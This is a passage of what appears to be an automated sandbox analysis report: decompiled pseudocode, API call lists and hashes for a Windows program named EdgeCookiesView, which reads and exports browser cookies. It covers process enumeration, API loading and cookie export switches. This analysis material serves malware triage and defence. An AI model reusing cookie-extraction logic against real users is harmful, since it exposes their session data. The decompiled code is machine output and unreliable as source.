					__eflags = _t60;
					if(_t60 == 0) {
						E0040A459(__ecx);
						_t132 = _t129;
						L31:
						__eflags = 0;
						E0040A1DC(0, _t118, _t132, 0);
						L32:
						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
						if(_t64 != 0 && _a4 == _t64) {
							_t127 = _a12;
							_t120 =  *(_a12 + 0xc);
							_t148 = _t120 & 0x00000008;
							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
							if((_t120 & 0x00000008) == 0) {
								__eflags = _t120 & 0x00000040;
								if((_t120 & 0x00000040) != 0) {
									 *0x412c2c =  *0x412c2c & 0x00000000;
									__eflags =  *0x412c2c;
									E004077CB(_t66);
								}
							} else {
								E0040990D(_t66, _t148, _t127);
							}
						}
						return E00401B1E(_t129, _a4, _a8, _a12);
					}
					_t69 = _t60 - 1;
					__eflags = _t69;
					if(_t69 == 0) {
						_t134 = __ecx + 0x69c;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
						_t118 =  *_t134;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
						L22:
						_t132 = _t129;
						E0040A3BF(_t129);
						goto L31;
					}
					_t75 = _t69 - 0x12;
					__eflags = _t75;
					if(__eflags == 0) {
						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
					} else {
						__eflags = _t75 - 0x41;
						if(__eflags == 0) {
							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
							E0040B00A(_t129);
						}
					}
					goto L32;
				}
				if(_t139 == 0) {
					_t38 = __ecx + 0x280;
					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
					__eflags =  *_t38;
					goto L22;
				}
				if(_t118 == 6) {
					__eflags = _a8 - 1;
					if(__eflags == 0) {
						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
					}
					goto L32;
				}
				if(_t118 == 0xc) {
					__eflags = E0040546C(_a12, L"EdgeCookiesView");
					if(__eflags == 0) {
						goto L32;
					}
					return 0;
				}
				if(_t118 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
					return 1;
				}
				if(_t118 == 0x2b) {
					_t115 = _a12;
					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					__eflags =  *(__ecx + 0x694);
					if(__eflags != 0) {
						L14:
						SetBkMode( *(_t115 + 0x18), 1);
						SetTextColor( *(_t115 + 0x18), 0xff0000);
						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t131 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
						SelectObject( *(_t131 + 0x18), _t97);
						_t129 = _v8;
						goto L32;
					}
					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
					asm("cdq");
					_t124 = 0x60;
					_t136 = _t105 * 0xe / _t124;
					_t108 =  *(__ecx + 0x694);
					__eflags = _t108;
					if(__eflags != 0) {
						DeleteObject(_t108);
						_t16 = __ecx + 0x694;
						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
						__eflags =  *_t16;
					}
					 *(_t129 + 0x694) = E004058D4(_t136);
					goto L14;
				} else {
					if(_t118 == 0x7b) {
						_t126 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
							E0040B607(__ecx, _t126);
						}
					}
					goto L32;
				}
			}

























                                                                                                                                                0x0040b81c
                                                                                                                                                0x0040b81e
                                                                                                                                                0x0040b826
                                                                                                                                                0x0040b828
                                                                                                                                                0x0040b82b
                                                                                                                                                0x0040b9cd
                                                                                                                                                0x0040b9cd
                                                                                                                                                0x0040b9d2
                                                                                                                                                0x0040ba34
                                                                                                                                                0x0040ba39
                                                                                                                                                0x0040ba3b
                                                                                                                                                0x0040ba3b
                                                                                                                                                0x0040ba3d
                                                                                                                                                0x0040ba42
                                                                                                                                                0x0040ba42
                                                                                                                                                0x0040ba4a
                                                                                                                                                0x0040ba51
                                                                                                                                                0x0040ba54
                                                                                                                                                0x0040ba57
                                                                                                                                                0x0040ba5a
                                                                                                                                                0x0040ba60
                                                                                                                                                0x0040ba6c
                                                                                                                                                0x0040ba6f
                                                                                                                                                0x0040ba71
                                                                                                                                                0x0040ba71
                                                                                                                                                0x0040ba78
                                                                                                                                                0x0040ba78
                                                                                                                                                0x0040ba62
                                                                                                                                                0x0040ba65
                                                                                                                                                0x0040ba65
                                                                                                                                                0x0040ba60
                                                                                                                                                0x00000000
                                                                                                                                                0x0040ba88
                                                                                                                                                0x0040b9d4
                                                                                                                                                0x0040b9d4
                                                                                                                                                0x0040b9d5
                                                                                                                                                0x0040ba17
                                                                                                                                                0x0040ba21
                                                                                                                                                0x0040ba24
                                                                                                                                                0x0040ba2a
                                                                                                                                                0x0040b9c2
                                                                                                                                                0x0040b9c2
                                                                                                                                                0x0040b9c4
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b9c4
                                                                                                                                                0x0040b9d7
                                                                                                                                                0x0040b9d7
                                                                                                                                                0x0040b9da
                                                                                                                                                0x0040ba10
                                                                                                                                                0x0040b9dc
                                                                                                                                                0x0040b9dc
                                                                                                                                                0x0040b9df
                                                                                                                                                0x0040b9f9
                                                                                                                                                0x0040ba03
                                                                                                                                                0x0040ba03
                                                                                                                                                0x0040b9df
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b9da
                                                                                                                                                0x0040b831
                                                                                                                                                0x0040b9bb
                                                                                                                                                0x0040b9bb
                                                                                                                                                0x0040b9bb
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b9bb
                                                                                                                                                0x0040b83a
                                                                                                                                                0x0040b996
                                                                                                                                                0x0040b99b
                                                                                                                                                0x0040b9b0
                                                                                                                                                0x0040b9b0
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b99b
                                                                                                                                                0x0040b843
                                                                                                                                                0x0040b985
                                                                                                                                                0x0040b989
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b98f
                                                                                                                                                0x0040b84c
                                                                                                                                                0x0040b94c
                                                                                                                                                0x0040b952
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b96a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b972
                                                                                                                                                0x0040b855
                                                                                                                                                0x0040b881
                                                                                                                                                0x0040b887
                                                                                                                                                0x0040b88d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b893
                                                                                                                                                0x0040b89a
                                                                                                                                                0x0040b8d7
                                                                                                                                                0x0040b8dc
                                                                                                                                                0x0040b8ea
                                                                                                                                                0x0040b8ff
                                                                                                                                                0x0040b908
                                                                                                                                                0x0040b909
                                                                                                                                                0x0040b90a
                                                                                                                                                0x0040b90b
                                                                                                                                                0x0040b90c
                                                                                                                                                0x0040b927
                                                                                                                                                0x0040b92e
                                                                                                                                                0x0040b935
                                                                                                                                                0x0040b93f
                                                                                                                                                0x0040b941
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b941
                                                                                                                                                0x0040b8a1
                                                                                                                                                0x0040b8aa
                                                                                                                                                0x0040b8ad
                                                                                                                                                0x0040b8b0
                                                                                                                                                0x0040b8b2
                                                                                                                                                0x0040b8b8
                                                                                                                                                0x0040b8ba
                                                                                                                                                0x0040b8bd
                                                                                                                                                0x0040b8c3
                                                                                                                                                0x0040b8c3
                                                                                                                                                0x0040b8c3
                                                                                                                                                0x0040b8c3
                                                                                                                                                0x0040b8d1
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b857
                                                                                                                                                0x0040b85a
                                                                                                                                                0x0040b866
                                                                                                                                                0x0040b86f
                                                                                                                                                0x0040b877
                                                                                                                                                0x0040b877
                                                                                                                                                0x0040b86f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b85a

                                                                                                                                                APIs
                                                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B8BD
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040B8DC
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0040B8FF
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
                                                                                                                                                • SelectObject.GDI32(00000014,00000000), ref: 0040B93F
                                                                                                                                                  • Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
                                                                                                                                                  • Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
                                                                                                                                                  • Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 0040B963
                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040B96A
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
                                                                                                                                                • memcpy.MSVCRT ref: 0040B9F9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                • String ID: EdgeCookiesView
                                                                                                                                                • API String ID: 1858646182-2656830938
                                                                                                                                                • Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                • Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
                                                                                                                                                • Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                • Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040CA5A, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040CA5A() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x413260 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryW(L"psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
					 *0x4128e8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x4128e0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
							 *0x4128d8 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x412b0c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x4128e4 = _t2;
									if(_t2 != 0) {
										 *0x413260 = 1;
									}
								}
							}
						}
					}
					if( *0x413260 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                                                                                0x0040ca61
                                                                                                                                                0x0040caf1
                                                                                                                                                0x0040caf1
                                                                                                                                                0x0040ca6d
                                                                                                                                                0x0040ca73
                                                                                                                                                0x0040ca77
                                                                                                                                                0x0040caf0
                                                                                                                                                0x00000000
                                                                                                                                                0x0040ca79
                                                                                                                                                0x0040ca86
                                                                                                                                                0x0040ca8a
                                                                                                                                                0x0040ca8f
                                                                                                                                                0x0040ca97
                                                                                                                                                0x0040ca9b
                                                                                                                                                0x0040caa0
                                                                                                                                                0x0040caa8
                                                                                                                                                0x0040caac
                                                                                                                                                0x0040cab1
                                                                                                                                                0x0040cab9
                                                                                                                                                0x0040cabd
                                                                                                                                                0x0040cac2
                                                                                                                                                0x0040caca
                                                                                                                                                0x0040cace
                                                                                                                                                0x0040cad3
                                                                                                                                                0x0040cad5
                                                                                                                                                0x0040cad5
                                                                                                                                                0x0040cad3
                                                                                                                                                0x0040cac2
                                                                                                                                                0x0040cab1
                                                                                                                                                0x0040caa0
                                                                                                                                                0x0040cae7
                                                                                                                                                0x0040caea
                                                                                                                                                0x0040caea
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cae7

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040CAEA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2449869053-70141382
                                                                                                                                                • Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                • Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
                                                                                                                                                • Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                • Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BCAA, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                			E0040BCAA(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(L"/shtml");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sverhtml");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/sxml");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/stab");
							L0040E03E();
							if(__eax != 0) {
								_push(L"/sjson");
								L0040E03E();
								if(__eax != 0) {
									_push(L"/scomma");
									L0040E03E();
									if(__eax != 0) {
										_push(L"/scookiestxt");
										L0040E03E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 4;
										return _t5;
									}
								} else {
									_t6 = 3;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 7;
							return _t8;
						}
					} else {
						_t9 = 6;
						return _t9;
					}
				} else {
					_t10 = 5;
					return _t10;
				}
			}









                                                                                                                                                0x0040bcab
                                                                                                                                                0x0040bcb0
                                                                                                                                                0x0040bcb9
                                                                                                                                                0x0040bcc0
                                                                                                                                                0x0040bcc5
                                                                                                                                                0x0040bcce
                                                                                                                                                0x0040bcd5
                                                                                                                                                0x0040bcda
                                                                                                                                                0x0040bce3
                                                                                                                                                0x0040bcea
                                                                                                                                                0x0040bcef
                                                                                                                                                0x0040bcf8
                                                                                                                                                0x0040bcff
                                                                                                                                                0x0040bd04
                                                                                                                                                0x0040bd0d
                                                                                                                                                0x0040bd14
                                                                                                                                                0x0040bd19
                                                                                                                                                0x0040bd22
                                                                                                                                                0x0040bd29
                                                                                                                                                0x0040bd2e
                                                                                                                                                0x0040bd35
                                                                                                                                                0x0040bd3f
                                                                                                                                                0x0040bd24
                                                                                                                                                0x0040bd26
                                                                                                                                                0x0040bd27
                                                                                                                                                0x0040bd27
                                                                                                                                                0x0040bd0f
                                                                                                                                                0x0040bd11
                                                                                                                                                0x0040bd12
                                                                                                                                                0x0040bd12
                                                                                                                                                0x0040bcfa
                                                                                                                                                0x0040bcfc
                                                                                                                                                0x0040bcfd
                                                                                                                                                0x0040bcfd
                                                                                                                                                0x0040bce5
                                                                                                                                                0x0040bce7
                                                                                                                                                0x0040bce8
                                                                                                                                                0x0040bce8
                                                                                                                                                0x0040bcd0
                                                                                                                                                0x0040bcd2
                                                                                                                                                0x0040bcd3
                                                                                                                                                0x0040bcd3
                                                                                                                                                0x0040bcbb
                                                                                                                                                0x0040bcbd
                                                                                                                                                0x0040bcbe
                                                                                                                                                0x0040bcbe

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1797186745
                                                                                                                                                • Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                • Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
                                                                                                                                                • Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                • Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C9D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                0x0040c9dd
                                                                                                                                                0x0040ca59
                                                                                                                                                0x0040ca59
                                                                                                                                                0x0040c9e5
                                                                                                                                                0x0040c9eb
                                                                                                                                                0x0040c9ef
                                                                                                                                                0x0040ca58
                                                                                                                                                0x00000000
                                                                                                                                                0x0040ca58
                                                                                                                                                0x0040c9fe
                                                                                                                                                0x0040ca02
                                                                                                                                                0x0040ca07
                                                                                                                                                0x0040ca0f
                                                                                                                                                0x0040ca13
                                                                                                                                                0x0040ca18
                                                                                                                                                0x0040ca20
                                                                                                                                                0x0040ca24
                                                                                                                                                0x0040ca29
                                                                                                                                                0x0040ca31
                                                                                                                                                0x0040ca35
                                                                                                                                                0x0040ca3a
                                                                                                                                                0x0040ca42
                                                                                                                                                0x0040ca46
                                                                                                                                                0x0040ca4b
                                                                                                                                                0x0040ca4d
                                                                                                                                                0x0040ca4d
                                                                                                                                                0x0040ca4b
                                                                                                                                                0x0040ca3a
                                                                                                                                                0x0040ca29
                                                                                                                                                0x0040ca18
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                • Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                • Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
                                                                                                                                                • Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                • Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004071D1, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E004071D1(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E004057D1(_a4);
				if(_t3 != 0) {
					wcscpy(0x412c38, _a4);
					wcscpy(0x412e48, L"general");
					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
					asm("sbb eax, eax");
					 *0x412ecc =  ~(_t6 - 1) + 1;
					E00406D4D(0x412ed0, L"charset", 0x3f);
					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                0x004071d5
                                                                                                                                                0x004071dd
                                                                                                                                                0x004071eb
                                                                                                                                                0x004071fb
                                                                                                                                                0x0040720c
                                                                                                                                                0x00407215
                                                                                                                                                0x00407224
                                                                                                                                                0x00407229
                                                                                                                                                0x0040723a
                                                                                                                                                0x00000000
                                                                                                                                                0x00407257
                                                                                                                                                0x00407258

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                • wcscpy.MSVCRT ref: 004071EB
                                                                                                                                                • wcscpy.MSVCRT ref: 004071FB
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 0040720C
                                                                                                                                                  • Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                • String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 3176057301-819253090
                                                                                                                                                • Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                • Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
                                                                                                                                                • Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                • Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040A5AB, Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040A5AB(void* __esi) {
				struct HDWP__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				struct tagPOINT _v56;
				void* _t53;
				int _t99;
				void* _t101;

				_t101 = __esi;
				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
					GetClientRect( *(__esi + 0x208),  &_v40);
					GetWindowRect( *(__esi + 0x214),  &_v56);
					_v20 = _v44 - _v56.y + 1;
					GetWindowRect( *(__esi + 0x218),  &_v56);
					_v16 = _v40.right - _v40.left;
					_t99 = _v44 - _v56.y + 1;
					_v24 = _v40.bottom - _v40.top;
					_v12 = 0xdc;
					if( *(__esi + 0x6d4) != 0) {
						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
						_v12 = _v44 + 6;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
						_v12 = _v12 & 0x00000000;
					}
					_v8 = BeginDeferWindowPos(4);
					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t53;
			}














                                                                                                                                                0x0040a5ab
                                                                                                                                                0x0040a5b8
                                                                                                                                                0x0040a5ca
                                                                                                                                                0x0040a5e0
                                                                                                                                                0x0040a5e9
                                                                                                                                                0x0040a5f6
                                                                                                                                                0x0040a604
                                                                                                                                                0x0040a60d
                                                                                                                                                0x0040a615
                                                                                                                                                0x0040a618
                                                                                                                                                0x0040a61f
                                                                                                                                                0x0040a637
                                                                                                                                                0x0040a647
                                                                                                                                                0x0040a653
                                                                                                                                                0x0040a653
                                                                                                                                                0x0040a663
                                                                                                                                                0x0040a665
                                                                                                                                                0x0040a665
                                                                                                                                                0x0040a67d
                                                                                                                                                0x0040a68e
                                                                                                                                                0x0040a6ad
                                                                                                                                                0x0040a6d8
                                                                                                                                                0x0040a6f0
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a6fc
